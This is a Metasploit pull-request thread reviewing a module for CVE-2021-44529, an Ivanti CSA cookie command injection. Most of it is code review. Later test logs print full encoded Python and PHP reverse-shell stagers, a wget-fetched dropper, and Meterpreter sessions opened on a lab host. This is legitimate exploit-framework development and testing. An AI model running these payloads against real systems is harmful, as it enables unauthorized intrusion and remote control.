Ivanti Cloud Services Appliance unauthenticated cookie-based command injection [CVE-2021-44529]
rapid7/metasploit-framework pull request #17449
Opened 2023-01-08 12:04 UTC by h00die-gr3y

In progress 

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

If you are opening a PR for a new module that exploits a **specific** piece of hardware or requires a **complex or hard-to-find** testing environment, we recommend that you send us a demo of your module executing correctly. Seeing your module in action will help us review your PR faster!

Specific Hardware Examples:
* Switches
* Routers
* IP Cameras
* IoT devices

Complex Software Examples:
* Expensive proprietary software
* Software with an extensive installation process
* Software that requires exploit testing across multiple significantly different versions
* Software without an English language UI

We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!

Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).

2023-01-08 22:39 UTC, wvu commented
So many h00dies!

2023-01-08 22:47 UTC, h00die commented
we're multiplying to tackle all the webapps.

2023-01-09 05:54 UTC, h00die-gr3y commented
> So many h00dies!

H00die would be a rich man if he would have registered this name as a trademark ;-)

2023-01-09 22:36 UTC, gwillcox-r7 requested changes

2023-01-09 22:36 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +    # randomize the cookie in terms cookie pairs "name=value"
English grammatically seems a bit off, could we please try to improve this?

2023-01-09 22:36 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +    # Number of cookie pairss should be at least 4, and the first cookie pair should be always name='ab'
```suggestion
    # Number of cookie pairs should be at least 4, and the first cookie pair should always have the value 'ab'.
```

2023-01-09 22:36 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +    # and the cookie number matching  no_of_cookies-2 should contain the payload
```suggestion
    # Note that the Nth cookie in the request, where N=no_of_cookies-2,  should contain the payload.
```

2023-01-09 22:36 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +    # and the cookie number matching  no_of_cookies-2 should contain the payload
Reworded this but out of interest did you figure out why this has to be the case? Seems like an interesting edge case. Not a blocker though, just curious 👍

2023-01-09 22:36 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +      if cookie_no == no_of_cookies - 2
Rather than doing this calculation every iteration of the loop, it may be better to move this before the loop starts so that  you only need to calculate it once.

2023-01-09 22:36 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +    # print_status("cookie: #{random_cookie}")
Debug statement left over here?

2023-01-09 22:36 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.md
> +to execute arbitrary code with limited permissions via a special crafted cookie against the client endpoint `/client/index.php`.
I'm still unclear how the cookie is specially crafted to meet requirements. Documentation and module description should be updated to better explain this in my opinion.

2023-01-09 22:36 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +  rescue StandardError => e
Rescuing StandardError here vs rescuing connection specific exceptions that could be thrown by `send_request_cgi`, which is the more appropriate approach here.

2023-01-09 22:36 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
This will end up potentially being called by the `check` method. You cannot do `fail_with` in any code path which might be called by `check`. I think I failed to notice this in your previous PR before I landed it so this is my bad for not calling this out last time, but something to note here.

2023-01-09 22:36 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +    parsed_html = Nokogiri::HTML.parse(res.body)
This is parsing XML from a HTML response with no rescuing should any errors be thrown, which will likely result in Metasploit itself crashing should the module encounter an unexpected response. Whilst I think this is somewhat limited with your current checks we should still always use error handling when parsing untrusted input to avoid this.

2023-01-09 22:36 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +      payload = Base64.strict_encode64("system(\"#{cmd}\");")
None of these payloads seem to have defined the `"` character as a bad character. May be a good idea to add this to the blocklist of characters that your payloads shouldn't be using given what your doing here.

2023-01-09 22:37 UTC, gwillcox-r7 commented
Will fix up a few of these PR comments myself, they were just left there for my own note. I'll update this comment and strike through this line when its ready to review.

2023-01-10 06:16 UTC, h00die-gr3y commented on documentation/modules/exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.md
> +```
It is actually explained it in the article that I submitted in [attackerkb](https://attackerkb.com/topics/XTKrwlZd7p/cve-2021-44529). Let me reference it here, so we do not duplicate the information.

2023-01-10 06:17 UTC, h00die-gr3y commented on documentation/modules/exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.md
> +* Start the appliance again and enable the ssh service in the security tab.
Yep, will put some more words of explanation around this.

2023-01-10 06:17 UTC, h00die-gr3y commented on documentation/modules/exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.md
> +* Version: `4.6.0-20211203.1950` -> not vulnerable
I will remove it.

2023-01-10 06:19 UTC, h00die-gr3y commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +  rescue StandardError => e
We discussed this in the previous submission, and reading your comments then, my understanding that your are fine with this test. Please correct my understanding if this is not the case and propose a rescue test that works for you and the team.

2023-01-10 06:20 UTC, h00die-gr3y commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
Well, this is where I get a bit confused, because in my early submissions, I used `print_error` instead of `fail_with` and one of the reviewers suggested to change this with `fail_with`. I am not a ruby expert and I tried to learn from previous reviews, but inconsistent review comments does not really help here. 
Let me dig up that reviewer comment...

2023-01-10 06:27 UTC, h00die-gr3y commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +      payload = Base64.strict_encode64("system(\"#{cmd}\");")
Yeah, good learning point. Never used bad characters definition in my modules. Will apply this from now one when applicable.

2023-01-10 13:39 UTC, jvoisin commented on documentation/modules/exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.md
> +  `// Load user configuration` section the following code:
Why?

2023-01-10 13:57 UTC, h00die-gr3y commented on documentation/modules/exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.md
> +  `// Load user configuration` section the following code:
well, the Ivanti CSA 4.6 version that you still can download has already the patch. So you need to add the vulnerable code again to test the module.

2023-01-10 14:07 UTC, h00die-gr3y commented on documentation/modules/exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.md
> +to execute arbitrary code with limited permissions via a special crafted cookie against the client endpoint `/client/index.php`.
I will reference the article that I submitted in [attackerkb](https://attackerkb.com/topics/XTKrwlZd7p/cve-2021-44529) that explains it in more detail.

2023-01-10 16:45 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
I don't know why he made that suggestion, that will break the `check` method. Its well known within our group that you should never call `fail_with` during any code path that `check` will call. I'll have a word with him and raise this up to him. Its most likely that it was an oversight on his part. Completely understand the confusion on your side and I apologize for this.

2023-01-10 17:08 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.md
> +  `// Load user configuration` section the following code:
Calling this out within the module docs would probably be a good idea. I think this is a good explanation and also relates to the removal of the `not vulnerable` comment by adding an appropriate explanation as to why its not vulnerable and how you make it vulnerable again.

2023-01-10 17:23 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +  rescue StandardError => e
Fair point, marking this as resolved.

2023-01-10 17:31 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +    if csa_version.text.blank?
May want to use safe navigation here since if the above returns `nil`, which is entirely possible then you will be calling `nil.text` which will fail since `text` isn't a valid method for `nil` objects.

2023-01-10 17:53 UTC, jvoisin commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +    payload = Base64.strict_encode64('system("cat /etc/LDBUILD");')
`payload = Base64.strict_encode64('readfile("/etc/LDBUILD");')` is a bit better, since `system` might be blocked in php's settings. It's also less noisy than having an `execve` syscall happening :P

2023-01-10 17:59 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.md
> +* Version: `4.6.0-20211203.1950` -> not vulnerable
Fixed with 57b38a879d9233b5a7817c9f55094fa3425adc46

2023-01-10 17:59 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.md
> +  `// Load user configuration` section the following code:
Explanation added with 57b38a879d9233b5a7817c9f55094fa3425adc46

2023-01-10 17:59 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
Fixed with 57b38a879d9233b5a7817c9f55094fa3425adc46, sorry for the confusion!

2023-01-10 18:00 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +    if csa_version.text.blank?
Fixed in 57b38a879d9233b5a7817c9f55094fa3425adc46

2023-01-10 18:01 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +      payload = Base64.strict_encode64("system(\"#{cmd}\");")
Fixed in 57b38a879d9233b5a7817c9f55094fa3425adc46

2023-01-10 18:01 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.md
> +```
Attempted to address this in 57b38a879d9233b5a7817c9f55094fa3425adc46

2023-01-10 18:01 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.md
> +to execute arbitrary code with limited permissions via a special crafted cookie against the client endpoint `/client/index.php`.
Attempted to address this in 57b38a879d9233b5a7817c9f55094fa3425adc46, let me know if this is okay.

2023-01-10 18:48 UTC, gwillcox-r7 commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
Unresolving this even though this is resolved to answer your question from before. Here is what I got from my discussion with @cdelafuente-r7 about why this occurred:

Alright, I know what happened. You’re right, `fail_with` cannot be used in `check`.
I suggested [here](https://github.com/rapid7/metasploit-framework/pull/17222#discussion_r1015728967) to change return `nil` in `execute_command`, not in `check_nsx_v_mgr`. Unfortunately, there the code was [changed](https://github.com/rapid7/metasploit-framework/pull/17222/commits/70669f3fea41d81f1a0515c7af7f040b4c9d976a) so that both methods were updated. I missed this bad fix before landing it. Calling `fail_with` in `check_nsx_v_mgr` is definitely wrong. I guess I only checked if he had made the requested changes and not if he had changed more than required.

So looks like it was a case of an extra change leading to unintended consequences, and this happened to slip past during the review process. I hope this explanation above helps answer things, and sorry again for the confusion.

2023-01-11 05:18 UTC, h00die-gr3y commented on documentation/modules/exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.md
> +to execute arbitrary code with limited permissions via a special crafted cookie against the client endpoint `/client/index.php`.
Yep, this is perfectly fine.

2023-01-11 06:28 UTC, h00die-gr3y commented on documentation/modules/exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.md
> +* Start the appliance again and enable the ssh service in the security tab.
see https://github.com/rapid7/metasploit-framework/pull/17449/commits/8602a6cf9ac35fd480e2e129317e4f35ea14daf5

2023-01-11 06:29 UTC, h00die-gr3y commented on modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb
> +    payload = Base64.strict_encode64('system("cat /etc/LDBUILD");')
Good suggestion. See https://github.com/rapid7/metasploit-framework/pull/17449/commits/8602a6cf9ac35fd480e2e129317e4f35ea14daf5

2023-01-11 14:21 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.md
> +* Start the appliance again and enable the ssh service in the security tab.
Looks good thanks for adding!

2023-01-11 17:10 UTC, gwillcox-r7 approved these changes

2023-01-17 17:48 UTC, gwillcox-r7 commented
Steps to potentially update:

1. Need to change the admin password in order to set up the application.

2023-01-17 18:19 UTC, gwillcox-r7 commented
Confirmed this is working with Python Meterepreter reverse_tcp payload:

```
msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > show options

Module options (exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.153.209  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    443              yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.
                                       0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.153.128  yes       The listen address (an interface may be specified)
   LPORT  9933             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > exploit

[*] Started reverse TCP handler on 192.168.153.128:9933 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.153.209:443 can be exploited.
[+] The target is vulnerable. Version: 4.6.0-20211203.1950
.
[*] Executing Unix Command with echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNo9UE1LxDAQPTe/ordMMIbtx5btYgURDyIiuHsTkTYdNTRNS5LVqvjf3ZDFywzvzZs3H2qcJ+tTN8kBPf/WquNd67AqufP2ID33akTyOtl0SZVJbWveELIV25LE269jTFwTm0VMkPMT3j1c373s9o83V/cs6IScjEHpAWhW5yKrNiJbFyLLN5TXdVGwoOostgNJcJE4+2Af5gunEWdYM6KbuJY4mLmVA9DLW8qdsCg/oGTsafVM+uaENSOf70pjqtFAzy700a4/+6+eR5oRXFBCuFz0KKdxtugcxCeIrioD2WNQ8h/q6Nb9MvIHweRfpQ\=\=\'\)\[0\]\)\)\) | exec $(which python || which python3 || which python2) -
[*] Sending stage (24376 bytes) to 192.168.153.209
[*] Meterpreter session 1 opened (192.168.153.128:9933 -> 192.168.153.209:33862) at 2023-01-17 12:18:30 -0600


meterpreter > 
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020
Architecture : x64
Meterpreter  : python/linux
meterpreter > getuid
Server username: nobody
meterpreter > 
```

2023-01-17 18:24 UTC, gwillcox-r7 commented
PHP payload working fine:

```
msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set TARGET 1
TARGET => 1
msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > show options

Module options (exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.153.209  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    443              yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.
                                       0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.153.128  yes       The listen address (an interface may be specified)
   LPORT  9998             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   PHP Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > show options

Module options (exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.153.209  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    443              yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.
                                       0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.153.128  yes       The listen address (an interface may be specified)
   LPORT  9998             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   PHP Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set LPORT 3023
LPORT => 3023
msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > run

[*] Started reverse TCP handler on 192.168.153.128:3023 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.153.209:443 can be exploited.
[+] The target is vulnerable. Version: 4.6.0-20211203.1950
.
[*] Executing PHP Command with eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTUzLjEyOCc7ICRwb3J0ID0gMzAyMzsgaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdmc29ja29wZW4nKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigkaXAsICRwb3J0KTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZihBRl9JTkVULCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7ICRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOyBpZiAoISRyZXMpIHsgZGllKCk7IH0gJHNfdHlwZSA9ICdzb2NrZXQnOyB9IGlmICghJHNfdHlwZSkgeyBkaWUoJ25vIHNvY2tldCBmdW5jcycpOyB9IGlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfSBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRsZW4gPSBzb2NrZXRfcmVhZCgkcywgNCk7IGJyZWFrOyB9IGlmICghJGxlbikgeyBkaWUoKTsgfSAkYSA9IHVucGFj.aygiTmxlbiIsICRsZW4pOyAkbGVuID0gJGFbJ2xlbiddOyAkYiA9ICcnOyB3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsgc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRiIC49IGZyZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGIgLj0gc29ja2V0X3JlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyB9IH0gJEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOyAkR0xPQkFMU1snbXNnc29ja190eXBlJ10gPSAkc190eXBlOyBpZiAoZXh0ZW5zaW9uX2xvYWRlZCgnc3Vob3NpbicpICYmIGluaV9nZXQoJ3N1aG9zaW4uZXhlY3V0b3IuZGlzYWJsZV9ldmFsJykpIHsgJHN1aG9zaW5fYnlwYXNzPWNyZWF0ZV9mdW5jdGlvbignJywgJGIpOyAkc3Vob3Npbl9ieXBhc3MoKTsgfSBlbHNlIHsgZXZhbCgkYik7IH0gZGllKCk7));
[*] Sending stage (39927 bytes) to 192.168.153.209
[*] Meterpreter session 2 opened (192.168.153.128:3023 -> 192.168.153.209:50420) at 2023-01-17 12:23:11 -0600

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux localhost.localdomain 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: nobody
meterpreter > 
```

2023-01-17 18:26 UTC, gwillcox-r7 commented
Native payload working fine:

```
msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > show options

Module options (exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.153.209  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    443              yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.
                                       0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.153.128  yes       The listen address (an interface may be specified)
   LPORT  3023             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Linux Dropper



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set LPORT 9245
LPORT => 9245
msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > run

[*] Started reverse TCP handler on 192.168.153.128:9245 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.153.209:443 can be exploited.
[+] The target is vulnerable. Version: 4.6.0-20211203.1950
.
[*] Executing Linux Dropper
[*] Using URL: http://192.168.153.128:8080/Kl0wvCFvuxkya
[*] Client 192.168.153.209 (Wget/1.14 (linux-gnu)) requested /Kl0wvCFvuxkya
[*] Sending payload to 192.168.153.209 (Wget/1.14 (linux-gnu))
[*] Sending stage (3045348 bytes) to 192.168.153.209
[*] Meterpreter session 3 opened (192.168.153.128:9245 -> 192.168.153.209:42994) at 2023-01-17 12:25:42 -0600
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Server stopped.

meterpreter > systeminfo
[-] Unknown command: systeminfo
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: nobody
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.153.209 - Meterpreter session 3 closed.  Reason: Died
msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > 
```

2023-01-17 18:45 UTC, gwillcox-r7 commented
Rebased to squash commits that were mostly code fixes from review. Will land this once tests pass. Thanks for the contribution @h00die-gr3y!

2023-01-17 19:05 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added for CVE-2021-44529, an unauthenticated code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512. Successful exploitation requires sending a crafted cookie to the client endpoint at `/client/index.php` to get command execution as the `nobody` user.

2023-01-17 19:08 UTC, merged